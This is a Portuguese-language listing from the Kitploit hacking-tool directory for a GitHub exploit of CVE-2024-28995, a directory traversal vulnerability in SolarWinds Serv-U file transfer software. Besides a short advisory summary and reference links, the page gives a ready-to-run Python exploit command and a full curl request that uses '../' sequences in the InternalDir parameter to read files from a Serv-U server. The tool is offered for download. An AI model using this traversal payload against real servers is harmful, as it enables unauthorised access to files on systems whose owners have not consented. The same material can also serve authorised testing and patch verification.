Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28995 — Exploit para CVE-2024-28995 | Kitploit
Ferramentas/GitHubGitHub/0xc4t/cve-2024-28995
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHub0xc4t/cve-2024-28995

CVE-2024-28995

Exploit para CVE-2024-28995

Ver Repositório
211há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit para CVE-2024-28995

Em 5 de junho de 2024, a SolarWinds publicou um aviso para CVE-2024-28995, uma vulnerabilidade de alta gravidade de travessia de diretório que afeta sua solução de transferência de arquivos Serv-U. A vulnerabilidade foi descoberta pelo pesquisador Hussein Daher da Web Immunify.

Usando o exploit

python3 CVE-2024-28995.py -t http://example.com/ -f somefile

Usando Curl

curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"

Referência:

  • https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28995
Baixar ferramenta